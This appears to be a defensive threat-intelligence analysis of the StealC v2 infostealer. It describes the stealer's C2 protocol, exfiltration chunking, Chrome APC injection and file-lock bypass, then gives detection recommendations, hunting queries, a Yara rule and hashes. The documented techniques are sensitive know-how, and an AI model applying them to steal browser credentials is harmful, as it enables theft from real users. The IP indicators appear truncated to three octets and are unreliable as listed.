C2 Communication: The initial communication to the Command and Control (C2) server involves sending a Base64-encoded blob containing the Build ID, Hardware ID (HWID), and the command “create”. The Build ID is hardcoded within the stealer build. The HWID is generated through a multi-step hashing process based on the system’s boot drive volume serial number, retrieved using the GetVolumeInformationA Windows API. This serial number undergoes a series of custom mathematical and bitwise operations to produce three hash values, which are then further processed to create an 8-byte array used in the final HWID format. A Python script is provided to reproduce the HWID generation process.

The stealer parses configuration parameters from the C2 server’s response, which is expected to be structured data in JSON format. It looks for an “opcode” parameter to validate the response structure. If validation fails, execution is aborted. The “opcode” is compared against “success” and “blocked” strings. If “blocked” is received, the stealer terminates, typically due to a blocked or duplicated HWID or IP address. Upon receiving the “success” opcode, the stealer proceeds to parse the configuration. Despite the developer’s claim of RC4 encryption for C2 communication, analysis reveals that the encryption logic is commented out in the backend, and simple Base64 encoding is used instead. The C2 server’s responses often contain dynamic values that appear to be session identification.

StealC Configuration Parameters: The configuration from the C2 server dictates the stealer’s actions. This includes parameters for targeting browser data (cookies, passwords, history, etc.), browser extensions (specifying unique extension token IDs and data storage types to extract from), and specific files on the victim’s system. For file targeting, CSIDL values are used to define specific folders like %LOCALAPPDATA% (value 0), %APPDATA% (value 1), %DESKTOP% (value 2), %USERPROFILE% (value 3), %DOCUMENTS% (value 4), %PROGRAMFILES% (value 5), and %PROGRAMFILES_86% (value 6). When files are sent to the C2, the “type” parameter in the JSON payload is “upload_file”.

To handle the exfiltration of potentially large files, StealC v2 implements a data chunking system. Large files are divided into approximately 512KB chunks. Each chunk is sent as a structured JSON payload containing file identification, current chunk number (part_index), and the total number of chunks (total_parts).

Browser Data Decryption: StealC v2 employs different strategies for decrypting browser data. For Firefox, decryption of passwords and cookies is performed directly within the stealer binary. It achieves this by first modifying the system’s PATH environment variable to include common Firefox installation directories, allowing it to load the NSS3.dll library using LoadLibraryA. Subsequently, it retrieves addresses of critical decryption functions like NSS_Init, NSS_Shutdown, PK11_GetInternalKeySlot, PK11_FreeSlot, PK11_Authenticate, and PK11_SDR_Decrypt using GetProcAddress.

For Chrome versions prior to v80, StealC v2 uses a straightforward decryption method. It accesses the “Login Data” SQLite database containing DPAPI-protected credentials. Leveraging Chrome’s pre-v80 implementation, which used a static, hardcoded AES key, the stealer can directly decrypt the credentials. For Chrome v80 and later, which introduced a more robust security model, StealC v2 utilizes APC (Asynchronous Procedure Call) injection. This involves creating a suspended Chrome process using CreateProcessA, allocating executable memory within it using VirtualAllocEx, and writing a custom embedded payload using WriteProcessMemory. This injected payload establishes a COM connection with Windows cryptographic services (DPAPI) using CoCreateInstance and CoSetProxyBlanket to decrypt the master key from Chrome’s Local State file. The decrypted master key is then sent back to the main stealer process via a named pipe. The C2 server has a PHP implementation that uses AES-256-GCM to decrypt the actual credentials using the received master key.

To access browser database files that might be locked by active browser processes, StealC v2 first uses ReadDirectoryChangesW to monitor for file system events. It then attempts to copy sensitive files like “Login Data,” “Cookies,” “Web Data,” and “Local State” to C:\ProgramData, with up to 10 retries per file. If these files remain locked, the stealer leverages the Windows Restart Manager API (using RmStartSession, RmRegisterResources, RmGetList) to identify the processes holding locks. It then uses OpenProcess and TerminateProcess to forcibly terminate these processes, thereby releasing the file locks.

Recommendations

Monitor network traffic for communication with the listed C2 IP addresses.
Inspect systems for the presence of files with the listed payload hashes.
Implement and deploy the provided Yara rule on endpoint security solutions to detect StealC v2.
Analyze system logs for suspicious process creation, especially involving powershell.exe with encoded commands or msiexec.exe with the /passive parameter.
Monitor for the creation of named event objects that match StealC v2’s behavior.
Investigate processes attempting to read or modify the PATH environment variable, particularly adding Firefox installation directories.
Detect and analyze processes injecting code into chrome.exe or using the Restart Manager API to forcibly terminate processes accessing browser database files.
Utilize the provided C2 hunting queries on threat intelligence platforms to identify potential StealC v2 infrastructure.

Hunting methods

FOFA Query: fid="VVO/09fqXkg8zzkjfF7aew==" Logic: This query searches for web pages with a specific fingerprint (fid) which was identified as being associated with StealC v2’s C2 panel.

Validin Query: body_hash=028ad738ff369741fa2f0074e49a0d8704521531 Logic: This query searches for web pages with a specific MD5 hash of the body content, which is indicative of the default or a common configuration of the StealC v2 C2 panel.

Censys Query: services.http.response.body="<!DOCTYPE html>\n<html>\n<head>\n <meta charset=\"utf-8\">\n <title>404 Not Found</title>\n <style>\n body {\n width: 35em;\n margin: 0 auto;\n font-family: Tahoma, Verdana, Arial, sans-serif;\n }\n </style>\n</head>\n<body>\n <h1>Not Found</h1>\n <p>The requested URL was not found on this server.</p>\n <hr>\n <address>nginx/1.18.0 (Ubuntu)</address>\n</body>\n</html>" Logic: This query searches for HTTP responses with a specific body content that corresponds to the default 404 Not Found page served by nginx 1.18.0 on Ubuntu, which has been observed in StealC v2 C2 infrastructure setups.

A Yara rule for detecting StealC v2 is also available.

rule win_mal_StealC_v2 {
    meta:
        author = "RussianPanda"
        description = "Detects StealC v2"
        hash = "bc7e489815352f360b6f0c0064e1d305db9150976c4861b19b614be0a5115f97"
        date = "4/10/2025"
    strings:
        $s1 = {48 8d ?? ?? ?? ??  00 48 8d}
        $s2 = {0F B7 C8 81 E9 19 04 00 00 74 14 83 E9 09 74 0F 83 E9 01 74 0A 83 E9 1C 74 05 83 F9 04 75 08}
    condition:
        uint16(0) == 0x5A4D and #s1 > 500 and all of them and filesize < 900KB
}

IOC

Hashes

841d0ebecc7dc7b7e06433fcd0cbbec911fa127fee34bfc7c34c946f84aee1ef
8aefa989626374e451620567517cc8862478a770ec0f2da0a910f3f8b5495422
11bbbbdfa669520d5cb2f600656be4259e0256e220ba85175f1ffe84de064a00
d60f7f3a2b46c6231734618eeddab803c3f29d0bb44b1e90dbbbc9f355a40931
71bc74ec4778c88bb7d1f3980093475bfd98d973b09945d51dff588d4da0b695
6b638236003f92b54a83abd988b3a9f92bd58c0c7727a637bc0e191597a421ad
a1b2aecdd1b37e0c7836f5c254398250363ea74013700d9a812c98269752f385
f02986c8beb4ae23fd9c1e4d923a208b2afcb69811d52aed3dc85ad60badf472
bc7e489815352f360b6f0c0064e1d305db9150976c4861b19b614be0a5115f97

IP Addresses

93.20.64
92.46.133
211.250.177
251.84.107
192.49.87
55.137.8
45.44.116
21.237.183
113.118.58
253.30.7
220.8.107
141.233.86
87.48.173
202.216.170
60.226.114
208.119.2
110.116.81
60.226.20
90.153.241
180.8.71
56.166.193
65.142.44
65.142.47
43.180.186
192.48.188
229.17.68
217.208.133
97.75.178
92.46.177
106.176.178
19.131.77
158.108.135
147.216.49
170.154.143
45.44.173
102.115.17
21.237.173
245.241.70

Original link: https://trac-labs.com/autopsy-of-a-failed-stealer-stealc-v2-a4e32da04396